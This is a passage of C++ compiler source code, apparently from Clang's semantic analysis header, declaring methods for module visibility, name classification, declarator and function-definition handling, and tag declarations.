Module *getCurrentModule() const {
return ModuleScopes.empty() ? nullptr : ModuleScopes.back().Module;
}
VisibleModuleSet VisibleModules;
public:
/// Get the module owning an entity.
Module *getOwningModule(Decl *Entity) { return Entity->getOwningModule(); }
/// Make a merged definition of an existing hidden definition \p ND
/// visible at the specified location.
void makeMergedDefinitionVisible(NamedDecl *ND);
bool isModuleVisible(const Module *M, bool ModulePrivate = false);
/// Determine whether a declaration is visible to name lookup.
bool isVisible(const NamedDecl *D) {
return !D->isHidden() || isVisibleSlow(D);
}
/// Determine whether any declaration of an entity is visible.
bool
hasVisibleDeclaration(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr) {
return isVisible(D) || hasVisibleDeclarationSlow(D, Modules);
}
bool hasVisibleDeclarationSlow(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules);
bool hasVisibleMergedDefinition(NamedDecl *Def);
bool hasMergedDefinitionInCurrentModule(NamedDecl *Def);
/// Determine if \p D and \p Suggested have a structurally compatible
/// layout as described in C11 6.2.7/1.
bool hasStructuralCompatLayout(Decl *D, Decl *Suggested);
/// Determine if \p D has a visible definition. If not, suggest a declaration
/// that should be made visible to expose the definition.
bool hasVisibleDefinition(NamedDecl *D, NamedDecl **Suggested,
bool OnlyNeedComplete = false);
bool hasVisibleDefinition(const NamedDecl *D) {
NamedDecl *Hidden;
return hasVisibleDefinition(const_cast<NamedDecl*>(D), &Hidden);
}
/// Determine if the template parameter \p D has a visible default argument.
bool
hasVisibleDefaultArgument(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is an explicit
/// specialization declaration for a specialization of a template. (For a
/// member specialization, use hasVisibleMemberSpecialization.)
bool hasVisibleExplicitSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is a member
/// specialization declaration (as opposed to an instantiated declaration).
bool hasVisibleMemberSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if \p A and \p B are equivalent internal linkage declarations
/// from different modules, and thus an ambiguity error can be downgraded to
/// an extension warning.
bool isEquivalentInternalLinkageDeclaration(const NamedDecl *A,
const NamedDecl *B);
void diagnoseEquivalentInternalLinkageDeclarations(
SourceLocation Loc, const NamedDecl *D,
ArrayRef<const NamedDecl *> Equiv);
bool isUsualDeallocationFunction(const CXXMethodDecl *FD);
bool isCompleteType(SourceLocation Loc, QualType T) {
return !RequireCompleteTypeImpl(Loc, T, nullptr);
}
bool RequireCompleteType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
bool RequireCompleteType(SourceLocation Loc, QualType T,
unsigned DiagID);
template <typename... Ts>
bool RequireCompleteType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteType(Loc, T, Diagnoser);
}
void completeExprArrayBound(Expr *E);
bool RequireCompleteExprType(Expr *E, TypeDiagnoser &Diagnoser);
bool RequireCompleteExprType(Expr *E, unsigned DiagID);
template <typename... Ts>
bool RequireCompleteExprType(Expr *E, unsigned DiagID, const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteExprType(E, Diagnoser);
}
bool RequireLiteralType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID);
template <typename... Ts>
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireLiteralType(Loc, T, Diagnoser);
}
QualType getElaboratedType(ElaboratedTypeKeyword Keyword,
const CXXScopeSpec &SS, QualType T,
TagDecl *OwnedTagDecl = nullptr);
QualType BuildTypeofExprType(Expr *E, SourceLocation Loc);
/// If AsUnevaluated is false, E is treated as though it were an evaluated
/// context, such as when building a type for decltype(auto).
QualType BuildDecltypeType(Expr *E, SourceLocation Loc,
bool AsUnevaluated = true);
QualType BuildUnaryTransformType(QualType BaseType,
UnaryTransformType::UTTKind UKind,
SourceLocation Loc);
//===--------------------------------------------------------------------===//
// Symbol table / Decl tracking callbacks: SemaDecl.cpp.
//
struct SkipBodyInfo {
SkipBodyInfo()
: ShouldSkip(false), CheckSameAsPrevious(false), Previous(nullptr),
New(nullptr) {}
bool ShouldSkip;
bool CheckSameAsPrevious;
NamedDecl *Previous;
NamedDecl *New;
};
DeclGroupPtrTy ConvertDeclToDeclGroup(Decl *Ptr, Decl *OwnedType = nullptr);
void DiagnoseUseOfUnimplementedSelectors();
bool isSimpleTypeSpecifier(tok::TokenKind Kind) const;
ParsedType getTypeName(const IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec *SS = nullptr,
bool isClassName = false, bool HasTrailingDot = false,
ParsedType ObjectType = nullptr,
bool IsCtorOrDtorName = false,
bool WantNontrivialTypeSourceInfo = false,
bool IsClassTemplateDeductionContext = true,
IdentifierInfo **CorrectedII = nullptr);
TypeSpecifierType isTagName(IdentifierInfo &II, Scope *S);
bool isMicrosoftMissingTypename(const CXXScopeSpec *SS, Scope *S);
void DiagnoseUnknownTypeName(IdentifierInfo *&II,
SourceLocation IILoc,
Scope *S,
CXXScopeSpec *SS,
ParsedType &SuggestedType,
bool IsTemplateName = false);
/// Attempt to behave like MSVC in situations where lookup of an unqualified
/// type name has failed in a dependent context. In these situations, we
/// automatically form a DependentTypeName that will retry lookup in a related
/// scope during instantiation.
ParsedType ActOnMSVCUnknownTypeName(const IdentifierInfo &II,
SourceLocation NameLoc,
bool IsTemplateTypeArg);
/// Describes the result of the name lookup and resolution performed
/// by \c ClassifyName().
enum NameClassificationKind {
/// This name is not a type or template in this context, but might be
/// something else.
NC_Unknown,
/// Classification failed; an error has been produced.
NC_Error,
/// The name has been typo-corrected to a keyword.
NC_Keyword,
/// The name was classified as a type.
NC_Type,
/// The name was classified as a specific non-type, non-template
/// declaration. ActOnNameClassifiedAsNonType should be called to
/// convert the declaration to an expression.
NC_NonType,
/// The name was classified as an ADL-only function name.
/// ActOnNameClassifiedAsUndeclaredNonType should be called to convert the
/// result to an expression.
NC_UndeclaredNonType,
/// The name denotes a member of a dependent type that could not be
/// resolved. ActOnNameClassifiedAsDependentNonType should be called to
/// convert the result to an expression.
NC_DependentNonType,
/// The name was classified as a non-type, and an expression representing
/// that name has been formed.
NC_ContextIndependentExpr,
/// The name was classified as a template whose specializations are types.
NC_TypeTemplate,
/// The name was classified as a variable template name.
NC_VarTemplate,
/// The name was classified as a function template name.
NC_FunctionTemplate,
/// The name was classified as an ADL-only function template name.
NC_UndeclaredTemplate,
};
class NameClassification {
NameClassificationKind Kind;
union {
ExprResult Expr;
NamedDecl *NonTypeDecl;
TemplateName Template;
ParsedType Type;
};
explicit NameClassification(NameClassificationKind Kind) : Kind(Kind) {}
public:
NameClassification(ParsedType Type) : Kind(NC_Type), Type(Type) {}
NameClassification(const IdentifierInfo *Keyword) : Kind(NC_Keyword) {}
static NameClassification Error() {
return NameClassification(NC_Error);
}
static NameClassification Unknown() {
return NameClassification(NC_Unknown);
}
static NameClassification ContextIndependentExpr(ExprResult E) {
NameClassification Result(NC_ContextIndependentExpr);
Result.Expr = E;
return Result;
}
static NameClassification NonType(NamedDecl *D) {
NameClassification Result(NC_NonType);
Result.NonTypeDecl = D;
return Result;
}
static NameClassification UndeclaredNonType() {
return NameClassification(NC_UndeclaredNonType);
}
static NameClassification DependentNonType() {
return NameClassification(NC_DependentNonType);
}
static NameClassification TypeTemplate(TemplateName Name) {
NameClassification Result(NC_TypeTemplate);
Result.Template = Name;
return Result;
}
static NameClassification VarTemplate(TemplateName Name) {
NameClassification Result(NC_VarTemplate);
Result.Template = Name;
return Result;
}
static NameClassification FunctionTemplate(TemplateName Name) {
NameClassification Result(NC_FunctionTemplate);
Result.Template = Name;
return Result;
}
static NameClassification UndeclaredTemplate(TemplateName Name) {
NameClassification Result(NC_UndeclaredTemplate);
Result.Template = Name;
return Result;
}
NameClassificationKind getKind() const { return Kind; }
ExprResult getExpression() const {
assert(Kind == NC_ContextIndependentExpr);
return Expr;
}
ParsedType getType() const {
assert(Kind == NC_Type);
return Type;
}
NamedDecl *getNonTypeDecl() const {
assert(Kind == NC_NonType);
return NonTypeDecl;
}
TemplateName getTemplateName() const {
assert(Kind == NC_TypeTemplate || Kind == NC_FunctionTemplate ||
Kind == NC_VarTemplate || Kind == NC_UndeclaredTemplate);
return Template;
}
TemplateNameKind getTemplateNameKind() const {
switch (Kind) {
case NC_TypeTemplate:
return TNK_Type_template;
case NC_FunctionTemplate:
return TNK_Function_template;
case NC_VarTemplate:
return TNK_Var_template;
case NC_UndeclaredTemplate:
return TNK_Undeclared_template;
default:
llvm_unreachable("unsupported name classification.");
}
}
};
/// Perform name lookup on the given name, classifying it based on
/// the results of name lookup and the following token.
///
/// This routine is used by the parser to resolve identifiers and help direct
/// parsing. When the identifier cannot be found, this routine will attempt
/// to correct the typo and classify based on the resulting name.
///
/// \param S The scope in which we're performing name lookup.
///
/// \param SS The nested-name-specifier that precedes the name.
///
/// \param Name The identifier. If typo correction finds an alternative name,
/// this pointer parameter will be updated accordingly.
///
/// \param NameLoc The location of the identifier.
///
/// \param NextToken The token following the identifier. Used to help
/// disambiguate the name.
///
/// \param CCC The correction callback, if typo correction is desired.
NameClassification ClassifyName(Scope *S, CXXScopeSpec &SS,
IdentifierInfo *&Name, SourceLocation NameLoc,
const Token &NextToken,
CorrectionCandidateCallback *CCC = nullptr);
/// Act on the result of classifying a name as an undeclared (ADL-only)
/// non-type declaration.
ExprResult ActOnNameClassifiedAsUndeclaredNonType(IdentifierInfo *Name,
SourceLocation NameLoc);
/// Act on the result of classifying a name as an undeclared member of a
/// dependent base class.
ExprResult ActOnNameClassifiedAsDependentNonType(const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsAddressOfOperand);
/// Act on the result of classifying a name as a specific non-type
/// declaration.
ExprResult ActOnNameClassifiedAsNonType(Scope *S, const CXXScopeSpec &SS,
NamedDecl *Found,
SourceLocation NameLoc,
const Token &NextToken);
/// Describes the detailed kind of a template name. Used in diagnostics.
enum class TemplateNameKindForDiagnostics {
ClassTemplate,
FunctionTemplate,
VarTemplate,
AliasTemplate,
TemplateTemplateParam,
Concept,
DependentTemplate
};
TemplateNameKindForDiagnostics
getTemplateNameKindForDiagnostics(TemplateName Name);
/// Determine whether it's plausible that E was intended to be a
/// template-name.
bool mightBeIntendedToBeTemplateName(ExprResult E, bool &Dependent) {
if (!getLangOpts().CPlusPlus || E.isInvalid())
return false;
Dependent = false;
if (auto *DRE = dyn_cast<DeclRefExpr>(E.get()))
return !DRE->hasExplicitTemplateArgs();
if (auto *ME = dyn_cast<MemberExpr>(E.get()))
return !ME->hasExplicitTemplateArgs();
Dependent = true;
if (auto *DSDRE = dyn_cast<DependentScopeDeclRefExpr>(E.get()))
return !DSDRE->hasExplicitTemplateArgs();
if (auto *DSME = dyn_cast<CXXDependentScopeMemberExpr>(E.get()))
return !DSME->hasExplicitTemplateArgs();
// Any additional cases recognized here should also be handled by
// diagnoseExprIntendedAsTemplateName.
return false;
}
void diagnoseExprIntendedAsTemplateName(Scope *S, ExprResult TemplateName,
SourceLocation Less,
SourceLocation Greater);
Decl *ActOnDeclarator(Scope *S, Declarator &D);
NamedDecl *HandleDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParameterLists);
void RegisterLocallyScopedExternCDecl(NamedDecl *ND, Scope *S);
bool DiagnoseClassNameShadow(DeclContext *DC, DeclarationNameInfo Info);
bool diagnoseQualifiedDeclaration(CXXScopeSpec &SS, DeclContext *DC,
DeclarationName Name, SourceLocation Loc,
bool IsTemplateId);
void
diagnoseIgnoredQualifiers(unsigned DiagID, unsigned Quals,
SourceLocation FallbackLoc,
SourceLocation ConstQualLoc = SourceLocation(),
SourceLocation VolatileQualLoc = SourceLocation(),
SourceLocation RestrictQualLoc = SourceLocation(),
SourceLocation AtomicQualLoc = SourceLocation(),
SourceLocation UnalignedQualLoc = SourceLocation());
void diagnosePointerAuthDisabled(SourceLocation loc, SourceRange range);
bool checkConstantPointerAuthKey(Expr *keyExpr, unsigned &key);
static bool adjustContextForLocalExternDecl(DeclContext *&DC);
void DiagnoseFunctionSpecifiers(const DeclSpec &DS);
NamedDecl *getShadowedDeclaration(const TypedefNameDecl *D,
const LookupResult &R);
NamedDecl *getShadowedDeclaration(const VarDecl *D, const LookupResult &R);
void CheckShadow(NamedDecl *D, NamedDecl *ShadowedDecl,
const LookupResult &R);
void CheckShadow(Scope *S, VarDecl *D);
/// Warn if 'E', which is an expression that is about to be modified, refers
/// to a shadowing declaration.
void CheckShadowingDeclModification(Expr *E, SourceLocation Loc);
void DiagnoseShadowingLambdaDecls(const sema::LambdaScopeInfo *LSI);
private:
/// Map of current shadowing declarations to shadowed declarations. Warn if
/// it looks like the user is trying to modify the shadowing declaration.
llvm::DenseMap<const NamedDecl *, const NamedDecl *> ShadowingDecls;
public:
void CheckCastAlign(Expr *Op, QualType T, SourceRange TRange);
void handleTagNumbering(const TagDecl *Tag, Scope *TagScope);
void setTagNameForLinkagePurposes(TagDecl *TagFromDeclSpec,
TypedefNameDecl *NewTD);
void CheckTypedefForVariablyModifiedType(Scope *S, TypedefNameDecl *D);
NamedDecl* ActOnTypedefDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous);
NamedDecl* ActOnTypedefNameDecl(Scope* S, DeclContext* DC, TypedefNameDecl *D,
LookupResult &Previous, bool &Redeclaration);
NamedDecl *ActOnVariableDeclarator(Scope *S, Declarator &D, DeclContext *DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope,
ArrayRef<BindingDecl *> Bindings = None);
NamedDecl *
ActOnDecompositionDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists);
// Returns true if the variable declaration is a redeclaration
bool CheckVariableDeclaration(VarDecl *NewVD, LookupResult &Previous);
void CheckVariableDeclarationType(VarDecl *NewVD);
bool DeduceVariableDeclarationType(VarDecl *VDecl, bool DirectInit,
Expr *Init);
void CheckCompleteVariableDeclaration(VarDecl *VD);
void CheckCompleteDecompositionDeclaration(DecompositionDecl *DD);
void MaybeSuggestAddingStaticToDecl(const FunctionDecl *D);
NamedDecl* ActOnFunctionDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope);
bool AddOverriddenMethods(CXXRecordDecl *DC, CXXMethodDecl *MD);
enum class CheckConstexprKind {
/// Diagnose issues that are non-constant or that are extensions.
Diagnose,
/// Identify whether this function satisfies the formal rules for constexpr
/// functions in the current lanugage mode (with no extensions).
CheckValid
};
bool CheckConstexprFunctionDefinition(const FunctionDecl *FD,
CheckConstexprKind Kind);
void DiagnoseHiddenVirtualMethods(CXXMethodDecl *MD);
void FindHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
void NoteHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
// Returns true if the function declaration is a redeclaration
bool CheckFunctionDeclaration(Scope *S,
FunctionDecl *NewFD, LookupResult &Previous,
bool IsMemberSpecialization);
bool shouldLinkDependentDeclWithPrevious(Decl *D, Decl *OldDecl);
bool canFullyTypeCheckRedeclaration(ValueDecl *NewD, ValueDecl *OldD,
QualType NewT, QualType OldT);
void CheckMain(FunctionDecl *FD, const DeclSpec &D);
void CheckMSVCRTEntryPoint(FunctionDecl *FD);
Attr *getImplicitCodeSegOrSectionAttrForFunction(const FunctionDecl *FD,
bool IsDefinition);
void CheckFunctionOrTemplateParamDeclarator(Scope *S, Declarator &D);
Decl *ActOnParamDeclarator(Scope *S, Declarator &D);
ParmVarDecl *BuildParmVarDeclForTypedef(DeclContext *DC,
SourceLocation Loc,
QualType T);
QualType adjustParameterTypeForObjCAutoRefCount(QualType T,
SourceLocation NameLoc,
TypeSourceInfo *TSInfo);
ParmVarDecl *CheckParameter(DeclContext *DC, SourceLocation StartLoc,
SourceLocation NameLoc, IdentifierInfo *Name,
QualType T, TypeSourceInfo *TSInfo,
StorageClass SC);
void ActOnParamDefaultArgument(Decl *param,
SourceLocation EqualLoc,
Expr *defarg);
void ActOnParamUnparsedDefaultArgument(Decl *param,
SourceLocation EqualLoc,
SourceLocation ArgLoc);
void ActOnParamDefaultArgumentError(Decl *param, SourceLocation EqualLoc);
bool SetParamDefaultArgument(ParmVarDecl *Param, Expr *DefaultArg,
SourceLocation EqualLoc);
// Contexts where using non-trivial C union types can be disallowed. This is
// passed to err_non_trivial_c_union_in_invalid_context.
enum NonTrivialCUnionContext {
// Function parameter.
NTCUC_FunctionParam,
// Function return.
NTCUC_FunctionReturn,
// Default-initialized object.
NTCUC_DefaultInitializedObject,
// Variable with automatic storage duration.
NTCUC_AutoVar,
// Initializer expression that might copy from another object.
NTCUC_CopyInit,
// Assignment.
NTCUC_Assignment,
// Compound literal.
NTCUC_CompoundLiteral,
// Block capture.
NTCUC_BlockCapture,
// lvalue-to-rvalue conversion of volatile type.
NTCUC_LValueToRValueVolatile,
};
/// Emit diagnostics if the initializer or any of its explicit or
/// implicitly-generated subexpressions require copying or
/// default-initializing a type that is or contains a C union type that is
/// non-trivial to copy or default-initialize.
void checkNonTrivialCUnionInInitializer(const Expr *Init, SourceLocation Loc);
// These flags are passed to checkNonTrivialCUnion.
enum NonTrivialCUnionKind {
NTCUK_Init = 0x1,
NTCUK_Destruct = 0x2,
NTCUK_Copy = 0x4,
};
/// Emit diagnostics if a non-trivial C union type or a struct that contains
/// a non-trivial C union is used in an invalid context.
void checkNonTrivialCUnion(QualType QT, SourceLocation Loc,
NonTrivialCUnionContext UseContext,
unsigned NonTrivialKind);
void AddInitializerToDecl(Decl *dcl, Expr *init, bool DirectInit);
void ActOnUninitializedDecl(Decl *dcl);
void ActOnInitializerError(Decl *Dcl);
void ActOnPureSpecifier(Decl *D, SourceLocation PureSpecLoc);
void ActOnCXXForRangeDecl(Decl *D);
StmtResult ActOnCXXForRangeIdentifier(Scope *S, SourceLocation IdentLoc,
IdentifierInfo *Ident,
ParsedAttributes &Attrs,
SourceLocation AttrEnd);
void SetDeclDeleted(Decl *dcl, SourceLocation DelLoc);
void SetDeclDefaulted(Decl *dcl, SourceLocation DefaultLoc);
void CheckStaticLocalForDllExport(VarDecl *VD);
void FinalizeDeclaration(Decl *D);
DeclGroupPtrTy FinalizeDeclaratorGroup(Scope *S, const DeclSpec &DS,
ArrayRef<Decl *> Group);
DeclGroupPtrTy BuildDeclaratorGroup(MutableArrayRef<Decl *> Group);
/// Should be called on all declarations that might have attached
/// documentation comments.
void ActOnDocumentableDecl(Decl *D);
void ActOnDocumentableDecls(ArrayRef<Decl *> Group);
void ActOnFinishKNRParamDeclarations(Scope *S, Declarator &D,
SourceLocation LocAfterDecls);
void CheckForFunctionRedefinition(
FunctionDecl *FD, const FunctionDecl *EffectiveDefinition = nullptr,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Decl *D,
SkipBodyInfo *SkipBody = nullptr);
void ActOnStartOfObjCMethodDef(Scope *S, Decl *D);
bool isObjCMethodDecl(Decl *D) {
return D && isa<ObjCMethodDecl>(D);
}
/// Determine whether we can delay parsing the body of a function or
/// function template until it is used, assuming we don't care about emitting
/// code for that function.
///
/// This will be \c false if we may need the body of the function in the
/// middle of parsing an expression (where it's impractical to switch to
/// parsing a different function), for instance, if it's constexpr in C++11
/// or has an 'auto' return type in C++14. These cases are essentially bugs.
bool canDelayFunctionBody(const Declarator &D);
/// Determine whether we can skip parsing the body of a function
/// definition, assuming we don't care about analyzing its body or emitting
/// code for that function.
///
/// This will be \c false only if we may need the body of the function in
/// order to parse the rest of the program (for instance, if it is
/// \c constexpr in C++11 or has an 'auto' return type in C++14).
bool canSkipFunctionBody(Decl *D);
void computeNRVO(Stmt *Body, sema::FunctionScopeInfo *Scope);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body, bool IsInstantiation);
Decl *ActOnSkippedFunctionBody(Decl *Decl);
void ActOnFinishInlineFunctionDef(FunctionDecl *D);
/// ActOnFinishDelayedAttribute - Invoked when we have finished parsing an
/// attribute for which parsing is delayed.
void ActOnFinishDelayedAttribute(Scope *S, Decl *D, ParsedAttributes &Attrs);
/// Diagnose any unused parameters in the given sequence of
/// ParmVarDecl pointers.
void DiagnoseUnusedParameters(ArrayRef<ParmVarDecl *> Parameters);
/// Diagnose whether the size of parameters or return value of a
/// function or obj-c method definition is pass-by-value and larger than a
/// specified threshold.
void
DiagnoseSizeOfParametersAndReturnValue(ArrayRef<ParmVarDecl *> Parameters,
QualType ReturnTy, NamedDecl *D);
void DiagnoseInvalidJumps(Stmt *Body);
Decl *ActOnFileScopeAsmDecl(Expr *expr,
SourceLocation AsmLoc,
SourceLocation RParenLoc);
/// Handle a C++11 empty-declaration and attribute-declaration.
Decl *ActOnEmptyDeclaration(Scope *S, const ParsedAttributesView &AttrList,
SourceLocation SemiLoc);
enum class ModuleDeclKind {
Interface, ///< 'export module X;'
Implementation, ///< 'module X;'
};
/// The parser has processed a module-declaration that begins the definition
/// of a module interface or implementation.
DeclGroupPtrTy ActOnModuleDecl(SourceLocation StartLoc,
SourceLocation ModuleLoc, ModuleDeclKind MDK,
ModuleIdPath Path, bool IsFirstDecl);
/// The parser has processed a global-module-fragment declaration that begins
/// the definition of the global module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
DeclGroupPtrTy ActOnGlobalModuleFragmentDecl(SourceLocation ModuleLoc);
/// The parser has processed a private-module-fragment declaration that begins
/// the definition of the private module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
/// \param PrivateLoc The location of the 'private' keyword.
DeclGroupPtrTy ActOnPrivateModuleFragmentDecl(SourceLocation ModuleLoc,
SourceLocation PrivateLoc);
/// The parser has processed a module import declaration.
///
/// \param StartLoc The location of the first token in the declaration. This
/// could be the location of an '@', 'export', or 'import'.
/// \param ExportLoc The location of the 'export' keyword, if any.
/// \param ImportLoc The location of the 'import' keyword.
/// \param Path The module access path.
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, ModuleIdPath Path);
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, Module *M,
ModuleIdPath Path = {});
/// The parser has processed a module import translated from a
/// #include or similar preprocessing directive.
void ActOnModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
void BuildModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
/// The parsed has entered a submodule.
void ActOnModuleBegin(SourceLocation DirectiveLoc, Module *Mod);
/// The parser has left a submodule.
void ActOnModuleEnd(SourceLocation DirectiveLoc, Module *Mod);
/// Create an implicit import of the given module at the given
/// source location, for error recovery, if possible.
///
/// This routine is typically used when an entity found by name lookup
/// is actually hidden within a module that we know about but the user
/// has forgotten to import.
void createImplicitModuleImportForErrorRecovery(SourceLocation Loc,
Module *Mod);
/// Kinds of missing import. Note, the values of these enumerators correspond
/// to %select values in diagnostics.
enum class MissingImportKind {
Declaration,
Definition,
DefaultArgument,
ExplicitSpecialization,
PartialSpecialization
};
/// Diagnose that the specified declaration needs to be visible but
/// isn't, and suggest a module import that would resolve the problem.
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
MissingImportKind MIK, bool Recover = true);
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
SourceLocation DeclLoc, ArrayRef<Module *> Modules,
MissingImportKind MIK, bool Recover);
Decl *ActOnStartExportDecl(Scope *S, SourceLocation ExportLoc,
SourceLocation LBraceLoc);
Decl *ActOnFinishExportDecl(Scope *S, Decl *ExportDecl,
SourceLocation RBraceLoc);
/// We've found a use of a templated declaration that would trigger an
/// implicit instantiation. Check that any relevant explicit specializations
/// and partial specializations are visible, and diagnose if not.
void checkSpecializationVisibility(SourceLocation Loc, NamedDecl *Spec);
/// We've found a use of a template specialization that would select a
/// partial specialization. Check that the partial specialization is visible,
/// and diagnose if not.
void checkPartialSpecializationVisibility(SourceLocation Loc,
NamedDecl *Spec);
/// Retrieve a suitable printing policy for diagnostics.
PrintingPolicy getPrintingPolicy() const {
return getPrintingPolicy(Context, PP);
}
/// Retrieve a suitable printing policy for diagnostics.
static PrintingPolicy getPrintingPolicy(const ASTContext &Ctx,
const Preprocessor &PP);
/// Scope actions.
void ActOnPopScope(SourceLocation Loc, Scope *S);
void ActOnTranslationUnitScope(Scope *S);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
RecordDecl *&AnonRecord);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
MultiTemplateParamsArg TemplateParams,
bool IsExplicitInstantiation,
RecordDecl *&AnonRecord);
Decl *BuildAnonymousStructOrUnion(Scope *S, DeclSpec &DS,
AccessSpecifier AS,
RecordDecl *Record,
const PrintingPolicy &Policy);
Decl *BuildMicrosoftCAnonymousStruct(Scope *S, DeclSpec &DS,
RecordDecl *Record);
/// Common ways to introduce type names without a tag for use in diagnostics.
/// Keep in sync with err_tag_reference_non_tag.
enum NonTagKind {
NTK_NonStruct,
NTK_NonClass,
NTK_NonUnion,
NTK_NonEnum,
NTK_Typedef,
NTK_TypeAlias,
NTK_Template,
NTK_TypeAliasTemplate,
NTK_TemplateTemplateArgument,
};
/// Given a non-tag type declaration, returns an enum useful for indicating
/// what kind of non-tag type this is.
NonTagKind getNonTagTypeDeclKind(const Decl *D, TagTypeKind TTK);
bool isAcceptableTagRedeclaration(const TagDecl *Previous,
TagTypeKind NewTag, bool isDefinition,
SourceLocation NewTagLoc,
const IdentifierInfo *Name);
enum TagUseKind {
TUK_Reference, // Reference to a tag: 'struct foo *X;'
TUK_Declaration, // Fwd decl of a tag: 'struct foo;'
TUK_Definition, // Definition of a tag: 'struct foo { int X; } Y;'
TUK_Friend // Friend declaration: 'friend struct foo;'
};
Decl *ActOnTag(Scope *S, unsigned TagSpec, TagUseKind TUK,
SourceLocation KWLoc, CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc, const ParsedAttributesView &Attr,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
MultiTemplateParamsArg TemplateParameterLists, bool &OwnedDecl,
bool &IsDependent, SourceLocation ScopedEnumKWLoc,
bool ScopedEnumUsesClassTag, TypeResult UnderlyingType,
bool IsTypeSpecifier, bool IsTemplateParamOrArg,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnTemplatedFriendTag(Scope *S, SourceLocation FriendLoc,
unsigned TagSpec, SourceLocation TagLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr,
MultiTemplateParamsArg TempParamLists);
TypeResult ActOnDependentTag(Scope *S,
unsigned TagSpec,
TagUseKind TUK,
const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation TagLoc,
SourceLocation NameLoc);
void ActOnDefs(Scope *S, Decl *TagD, SourceLocation DeclStart,
IdentifierInfo *ClassName,
SmallVectorImpl<Decl *> &Decls);
Decl *ActOnField(Scope *S, Decl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth);
FieldDecl *HandleField(Scope *S, RecordDecl *TagD, SourceLocation DeclStart,
Declarator &D, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS);
MSPropertyDecl *HandleMSProperty(Scope *S, RecordDecl *TagD,
SourceLocation DeclStart, Declarator &D,
Expr *BitfieldWidth,
InClassInitStyle InitStyle,
AccessSpecifier AS,
const ParsedAttr &MSPropertyAttr);
FieldDecl *CheckFieldDecl(DeclarationName Name, QualType T,
TypeSourceInfo *TInfo,
RecordDecl *Record, SourceLocation Loc,
bool Mutable, Expr *BitfieldWidth,
InClassInitStyle InitStyle,
SourceLocation TSSL,
AccessSpecifier AS, NamedDecl *PrevDecl,
Declarator *D = nullptr);
bool CheckNontrivialField(FieldDecl *FD);
void DiagnoseNontrivial(const CXXRecordDecl *Record, CXXSpecialMember CSM);
enum TrivialABIHandling {
/// The triviality of a method unaffected by "trivial_abi".
TAH_IgnoreTrivialABI,
/// The triviality of a method affected by "trivial_abi".
TAH_ConsiderTrivialABI
};
bool SpecialMemberIsTrivial(CXXMethodDecl *MD, CXXSpecialMember CSM,
TrivialABIHandling TAH = TAH_IgnoreTrivialABI,
bool Diagnose = false);
/// For a defaulted function, the kind of defaulted function that it is.
class DefaultedFunctionKind {
CXXSpecialMember SpecialMember : 8;
DefaultedComparisonKind Comparison : 8;
public:
DefaultedFunctionKind()
: SpecialMember(CXXInvalid), Comparison(DefaultedComparisonKind::None) {
}
DefaultedFunctionKind(CXXSpecialMember CSM)
: SpecialMember(CSM), Comparison(DefaultedComparisonKind::None) {}
DefaultedFunctionKind(DefaultedComparisonKind Comp)
: SpecialMember(CXXInvalid), Comparison(Comp) {}
bool isSpecialMember() const { return SpecialMember != CXXInvalid; }
bool isComparison() const {
